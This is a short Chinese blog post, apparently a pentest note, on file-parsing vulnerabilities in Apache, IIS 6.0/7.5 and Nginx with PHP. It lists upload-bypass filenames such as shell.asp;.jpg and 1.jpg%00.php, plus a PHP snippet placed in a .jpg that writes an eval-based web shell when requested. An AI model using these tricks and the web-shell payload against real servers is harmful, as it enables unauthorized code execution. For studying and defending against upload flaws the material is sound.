服务器解析漏洞

apache
apache1.x,2.x解析漏洞:
解析文件时,从后向前解析直到遇到第一个可以被识别的后缀名
例如:1.php.abc
因为不能识别abc就向前解析,识别到php,从未将文件解析为php文件
iis
iis6.0解析漏洞:
1.目录解析漏洞:(<=6.0)
如果目录名包含.asp,.asa,.cer,都会被当作asp解析,例如:/xx.asp/shell.jpg
2.文件解析:
服务器默认不解析;后面的内容,因此可上传shell.asp;.jpg
3.优先解析:
如果文件名中包含.asp,.asa,.cer,会优先解析为aps
4.iis7.5与nginx漏洞相似
nginx
nginx解析漏洞并不是本身的漏洞,而是由于php的配置文件出现的漏洞,如果在php配置文件中开启fix_pathinfo这个选项啊,传入shell.jpg/1.php就会将文件名(SCRIPT_FILENAME)认为是shell.jpg,文件类型(PATH_INFO)认为是1.php,就当作php文件来执行了
漏洞形式有:
url/1.jpg/1.php
url/1.jpg%00.php
url/1.jpg%20\0.php
还有一种:
上传一个1.jpg文件,内容为:

<?php fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd]);?>');?>

访问1.jpg/.php就会在这个目录下生成shell.php

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值